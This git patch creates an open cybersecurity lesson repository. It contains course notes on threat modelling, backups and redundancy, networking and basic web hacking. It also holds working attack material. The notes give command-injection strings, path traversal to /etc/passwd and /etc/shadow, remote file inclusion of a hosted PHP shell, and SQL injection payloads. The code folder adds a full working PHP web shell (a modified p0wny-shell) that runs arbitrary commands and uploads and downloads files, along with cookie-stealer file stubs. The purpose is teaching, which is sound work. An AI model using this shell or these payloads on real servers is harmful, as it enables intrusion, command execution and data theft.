From 9c7ec708fbbce3511fb7994b1b3d30919970ace5 Mon Sep 17 00:00:00 2001 From: PrincessPi3 Date: Fri, 28 Jun 2024 18:50:56 -0600 Subject: [PATCH] Initial commit --- .gitattributes | 2 + 01 - Intro to Cybersec.txt | 157 +++++ 02 - Intro to Networking and Web.txt | 128 ++++ README.md | 2 + .../cookie_stealer_xss_basic.html | 5 + .../cookie_stealer/cookiestealer.php | 1 + code-examples/minimal-php-shell.php | 1 + code-examples/p0wny-shell-mod-FI.php | 609 ++++++++++++++++++ 8 files changed, 905 insertions(+) create mode 100644 .gitattributes create mode 100644 01 - Intro to Cybersec.txt create mode 100644 02 - Intro to Networking and Web.txt create mode 100644 README.md create mode 100644 code-examples/cookie_stealer/cookie_stealer_xss_basic.html create mode 100644 code-examples/cookie_stealer/cookiestealer.php create mode 100644 code-examples/minimal-php-shell.php create mode 100644 code-examples/p0wny-shell-mod-FI.php diff --git a/.gitattributes b/.gitattributes new file mode 100644 index 0000000..dfe0770 --- /dev/null +++ b/.gitattributes @@ -0,0 +1,2 @@ +# Auto detect text files and perform LF normalization +* text=auto diff --git a/01 - Intro to Cybersec.txt b/01 - Intro to Cybersec.txt new file mode 100644 index 0000000..d944cd4 --- /dev/null +++ b/01 - Intro to Cybersec.txt @@ -0,0 +1,157 @@ +Lesson 1: Theory +define "assessing threats and mitigating risk within means" + "assessing theats" + Threat actors "who is threatening my shit" + Script kiddies - hack for bragging rights, low sophistication + "a `hacker` who uses premade tools and exploits without understanding them" + Hacktivists - Political motive + higher sophistication + more motivated + far more targeted + Organized crime - profit motive + Even higher sophistication + Scams, spam, phishing, malware + "scanning the whole fuckin internet for known exploits" + APTs - Advanced Persistant Threats - nation-state actors + Highest level of sophistication + Highly funded, large groups, well Organized + Espionage motives - occasional profit motive + Tend to operate in social engineering or especially 0day exploits. + Super important: find out who your most likely threat actors are. + Assets + "what shit do I have that needs to be protected" / "attack surface" + computers, phones, apps, servers, etc + Human beings + Super important: inventory your assets + "risk" + Financial + Reputational / social + Political + Important: find out what the risk of being pwned is + "mitigating" + Important: what assets should we focus on protecting? + Important: how should we go about protecting them? + "means" + Money + Time + user compliance +GRC + Governance + Policies + Adminsistration + "structure" + Risk + above + Compliance + "what laws do we have to follow?" +CIA Triad + Confidentiality + keep secrets secret + Make sure the people who need access, have access, securely + Integrity + Make sure your data is intact, unmodified, uncorrupted, correct + Availabiltiy + "make sure what should be available remains available" + +Blue Team + "on defence" +Red Team "informs blue team" + "white hack hackers" + Try to break blue team's shit + they exist to inform blue team. +Purple Team "red team and blue team work together" + best model (imo) + +Inventory Threats + Make a list of shit that could go wrong, as complete as possible + organize by impact and likelyhood + +Threat heatmap + a simple heatmap + likelyhood of an attack (per year) (1-100%) + VS + impact of an attack (1-100) + One corner is "high likelyhood, high impact" + focus resources at quadrent + Opposite corner is "low likelyhood, low impact" + monitor, keep an eye on it + +Continuity of business / disaster response/recovery + "to keep shit up and running when shit goes wrong" + Important: make a frikkn plan + Include: timeframe for fixes and cost of fixes + Backups + FUCKING DO THEM TWO LOCAL ONE REMOTE MINIMUM + Types: + Incremental + only back up data that has changed + uses less disk space + can be used for recovering from file deletes, mistakes, etc where you want to roll back the data + often the slowest to fully recover from + Full + just a full, seperate copy of all your data + os image, whatever + the largest in terms of filesize + also the fastest to recover from + You need both! + Schedule + "how often should we do a full backup?" + "how long should we store old data?" + "how often do we update the redundant storage?" + + Redundancy + "having more than one thing in case it breaks" + 9s problem + 99% uptime on a decent thing is kinda a given + 99.9% uptime (one 9 of uptime) + backup servers + faster incident response + more redundancy and procedure + 99.99% uptime (two 9s) + geographically seperated backup servers + content delivery network + backup equipment to work on it (workstations, etc) + 99.999+% uptime (three 9s) + fuckikn insane google-tier shit + Important: define what level of redundancy you need and can afford + + Cold site, warm site, hot site + "spaces, physical or digital, that you can fall back to" + Backup physical office space + Backup datacenter + A spare cloud hosting account with your images loaded + Cold site + a backup space that will take some real time to get running + Hot site + a site that is 100% functional and ready to switch to at any time + Warm site + somewhere in-between + Power (electrical generator, power bank) + Manpower + Hardware (backup workstations, etc) + Backups + Important: "what is so important that we will spend money and time to mitigate downtime?" +Security Team + CISO - Cheif Information Security Officer + Generally report to the Chief Information Officer (CIO) or the Cheif Technical Officer (CTO) + Imo: CISO should to the board/president + Policymakers - make policies and rules and shit + + Administration level - managing shit day to day + + SOC - Security Operations Center + SOCs are fuckin cool + SOC base-level employee is a "threat analyst" + Monitor the cyber security status of the comany + tools like Splunk aggregate logs and alerts and put them into big tables, graphs, charts, maps, etc + When soemthing happens, they escelate to incident resoponse (IR) + which could be elevated to the disaster recovery team (OneDrive) + +Monitoring + aggregate logs, alerts, security involved actions, all in one place + Splunk or free option ELK Stack + Baselining + "finding out what `normal` looks like, and build alerts for deviations" + AI works super good for this as a STARTING POINT + +Cyber security domains: https://taosecurity.blogspot.com/2017/03/cybersecurity-domains-mind-map.html \ No newline at end of file diff --git a/02 - Intro to Networking and Web.txt b/02 - Intro to Networking and Web.txt new file mode 100644 index 0000000..e1c564e --- /dev/null +++ b/02 - Intro to Networking and Web.txt @@ -0,0 +1,128 @@ +== Networking == +IPv4/IPv6 + ipv4 127.0.0.1 + ipv6 2001:db8:3c4d:15::1a2f:1a2b. +DNS + translates domain names into ip addressess + +client server + CLIENT = YOU(r device) + web server in this case + client: "hey google give me x page" -> upload + google: "here I found it, go ahead and download this page" <- download + request -> reply + +TCP/UDP + +web pages + files. .html .php .aspx + request: /dogs.html -> server: here is dogs.html +request/reply/"everything is a file" +frontend/backend + +get/post/etc + "hey google, search for ppony fanfics" + request: POST search=pony fanfics + +frontend: is the stuff sent to your Browser + and the web pages you make requests to + (public, client-facing) + html/css/javascript +backend: web servers, + php, node, + database, actions, api + +== Basic Web Hacking == +DVWA +Web Browser: +* command injection + get the GET var (ip) + load that into a command (ping command) + execute + theory: execute("ping $ip"); + $ip = 8.8.8.8 + Theory execute("ping 8.8.8.8") + $ip = 8.8.8.8; ls + $ip = 8.8.8.8 && ls -lah && whoami && groups && id + $ip = 8.8.8.8 && echo "hello world" > file.txt + + a few things to try: + ; (stack commands) + && (stacks commands) + ` (executes commands on some systems) + echo "something" > file.php (make a file) + +* LFI + Local File Inclusion + "web server loads a file from its own drive and shows it" + try making it read a sensitive file? + a few things to try: + /etc/shadow + /etc/passwd + ../../../../../../../../etc/passwd + Leak sensitive files + Database files +* RFI upload + When web server downlaods and executes a remote file + like: /page.php?file=file1.php -> /page.php?file=https://pastebin.com/raw/jmtqDfWQ + (if you need multiple GET variables): + ./page.php?file=https://pastebin.com/raw/jmtqDfWQ&somevar=1337 + (append &variablename=value) + a few things to try: + PHP shell + p0wny-shell-FI-mod: https://pastebin.com/raw/jmtqDfWQ ( Source: https://github.com/flozz/p0wny-shell ) +simple-php-shell: https://pastebin.com/raw/uxbKCBGg + Malware of any type +* Stored XSS + +* Reflected XSS + like search pages, etc + uses GET variables in the URL usually + requires tricking a victem into clicking a malicious link +* Open HTTP Redirect + get variables usually + just let you redirect from a legitimate site to your own + usually requires getting a victim to click a malicious link + +SQL Injection: + "modifying an SQL query to do something fun" + Lab: https://www.db-fiddle.com/f/mZ2ftcLLzZLbrEELn38hjQ/17 + Theory: SELEC + $user = Delilah123 + $password = ?? + SELECT * FROM users WHERE username='$user' AND password='$password'; + $password = ' + SELECT * FROM users WHERE username='Delilah123' AND password='''; + ERROR! + $password = anythinghere' OR 1=1 + SELECT * FROM users WHERE username='Delilah123' AND password='anythinghere' OR 1=1' + ERROR + > always true! + + $password = anythinghere' OR 1=1 -- + -- is an sql comment! (space at start and end) + SELECT * FROM users WHERE username='Delilah123' AND password='anythinghere' OR 1=1 -- ' + EXECUTES AND MATCHES! + +#Burp Suite: +#* Weak session IDs +#* Brute force + +#Coding: +#* CSRF +#* XSS keylogger +#* Advanced XSS+CSRF payload + +Links: +SQL Injection Lab (WIP): https://www.db-fiddle.com/f/mZ2ftcLLzZLbrEELn38hjQ/16 +p0wny-shell-FI-mod: https://pastebin.com/raw/jmtqDfWQ ( Source: https://github.com/flozz/p0wny-shell ) +simple-php-shell: https://pastebin.com/raw/uxbKCBGg +basic XSS cookie stealer: https://pastebin.com/raw/puftrh39 +General payloads including XSS and SQL Injection: https://swisskyrepo.github.io/PayloadsAllTheThings/ +General hacking: https://cheatsheet.haax.fr/ +Pi Pico W Power Analysis Tool (WIP): https://github.com/PrincessPi3/PiPicoPATLFGGGGG + diff --git a/README.md b/README.md new file mode 100644 index 0000000..9708b01 --- /dev/null +++ b/README.md @@ -0,0 +1,2 @@ +# OpenCybersecLessonPlan + Open Coursework for Cyber Security diff --git a/code-examples/cookie_stealer/cookie_stealer_xss_basic.html b/code-examples/cookie_stealer/cookie_stealer_xss_basic.html new file mode 100644 index 0000000..06b07b7 --- /dev/null +++ b/code-examples/cookie_stealer/cookie_stealer_xss_basic.html @@ -0,0 +1,5 @@ + \ No newline at end of file diff --git a/code-examples/cookie_stealer/cookiestealer.php b/code-examples/cookie_stealer/cookiestealer.php new file mode 100644 index 0000000..31cc004 --- /dev/null +++ b/code-examples/cookie_stealer/cookiestealer.php @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/code-examples/minimal-php-shell.php b/code-examples/minimal-php-shell.php new file mode 100644 index 0000000..aea37c2 --- /dev/null +++ b/code-examples/minimal-php-shell.php @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/code-examples/p0wny-shell-mod-FI.php b/code-examples/p0wny-shell-mod-FI.php new file mode 100644 index 0000000..25e48f6 --- /dev/null +++ b/code-examples/p0wny-shell-mod-FI.php @@ -0,0 +1,609 @@ + 'admin', + 'hostname' => 'password', +); + +function expandPath($path) { + if (preg_match("#^(~[a-zA-Z0-9_.-]*)(/.*)?$#", $path, $match)) { + exec("echo $match[1]", $stdout); + return $stdout[0] . $match[2]; + } + return $path; +} + +function allFunctionExist($list = array()) { + foreach ($list as $entry) { + if (!function_exists($entry)) { + return false; + } + } + return true; +} + +function executeCommand($cmd) { + $output = ''; + if (function_exists('exec')) { + exec($cmd, $output); + $output = implode("\n", $output); + } else if (function_exists('shell_exec')) { + $output = shell_exec($cmd); + } else if (allFunctionExist(array('system', 'ob_start', 'ob_get_contents', 'ob_end_clean'))) { + ob_start(); + system($cmd); + $output = ob_get_contents(); + ob_end_clean(); + } else if (allFunctionExist(array('passthru', 'ob_start', 'ob_get_contents', 'ob_end_clean'))) { + ob_start(); + passthru($cmd); + $output = ob_get_contents(); + ob_end_clean(); + } else if (allFunctionExist(array('popen', 'feof', 'fread', 'pclose'))) { + $handle = popen($cmd, 'r'); + while (!feof($handle)) { + $output .= fread($handle, 4096); + } + pclose($handle); + } else if (allFunctionExist(array('proc_open', 'stream_get_contents', 'proc_close'))) { + $handle = proc_open($cmd, array(0 => array('pipe', 'r'), 1 => array('pipe', 'w')), $pipes); + $output = stream_get_contents($pipes[1]); + proc_close($handle); + } + return $output; +} + +function isRunningWindows() { + return stripos(PHP_OS, "WIN") === 0; +} + +function featureShell($cmd, $cwd) { + $stdout = ""; + + if (preg_match("/^\s*cd\s*(2>&1)?$/", $cmd)) { + chdir(expandPath("~")); + } elseif (preg_match("/^\s*cd\s+(.+)\s*(2>&1)?$/", $cmd)) { + chdir($cwd); + preg_match("/^\s*cd\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match); + chdir(expandPath($match[1])); + } elseif (preg_match("/^\s*download\s+[^\s]+\s*(2>&1)?$/", $cmd)) { + chdir($cwd); + preg_match("/^\s*download\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match); + return featureDownload($match[1]); + } else { + chdir($cwd); + $stdout = executeCommand($cmd); + } + + return array( + "stdout" => base64_encode($stdout), + "cwd" => base64_encode(getcwd()) + ); +} + +function featurePwd() { + return array("cwd" => base64_encode(getcwd())); +} + +function featureHint($fileName, $cwd, $type) { + chdir($cwd); + if ($type == 'cmd') { + $cmd = "compgen -c $fileName"; + } else { + $cmd = "compgen -f $fileName"; + } + $cmd = "/bin/bash -c \"$cmd\""; + $files = explode("\n", shell_exec($cmd)); + foreach ($files as &$filename) { + $filename = base64_encode($filename); + } + return array( + 'files' => $files, + ); +} + +function featureDownload($filePath) { + $file = @file_get_contents($filePath); + if ($file === FALSE) { + return array( + 'stdout' => base64_encode('File not found / no read permission.'), + 'cwd' => base64_encode(getcwd()) + ); + } else { + return array( + 'name' => base64_encode(basename($filePath)), + 'file' => base64_encode($file) + ); + } +} + +function featureUpload($path, $file, $cwd) { + chdir($cwd); + $f = @fopen($path, 'wb'); + if ($f === FALSE) { + return array( + 'stdout' => base64_encode('Invalid path / no write permission.'), + 'cwd' => base64_encode(getcwd()) + ); + } else { + fwrite($f, base64_decode($file)); + fclose($f); + return array( + 'stdout' => base64_encode('Done.'), + 'cwd' => base64_encode(getcwd()) + ); + } +} + +function initShellConfig() { + global $SHELL_CONFIG; + + if (isRunningWindows()) { + $username = getenv('USERNAME'); + if ($username !== false) { + $SHELL_CONFIG['username'] = $username; + } + } else { + $pwuid = posix_getpwuid(posix_geteuid()); + if ($pwuid !== false) { + $SHELL_CONFIG['username'] = $pwuid['name']; + } + } + + $hostname = gethostname(); + if ($hostname !== false) { + $SHELL_CONFIG['hostname'] = $hostname; + } +} + +if (isset($_GET["feature"])) { + + $response = NULL; + + switch ($_GET["feature"]) { + case "shell": + $cmd = $_POST['cmd']; + if (!preg_match('/2>/', $cmd)) { + $cmd .= ' 2>&1'; + } + $response = featureShell($cmd, $_POST["cwd"]); + break; + case "pwd": + $response = featurePwd(); + break; + case "hint": + $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']); + break; + case 'upload': + $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']); + } + + header("Content-Type: application/json"); + echo json_encode($response); + die(); +} else { + initShellConfig(); +} + +?> + + + + + + p0wny@shell:~# + + + + + + + +
+
+                
+            
+
+ +
+ +
+
+
+

Source: p0wny-shell by flozz

+ + + + \ No newline at end of file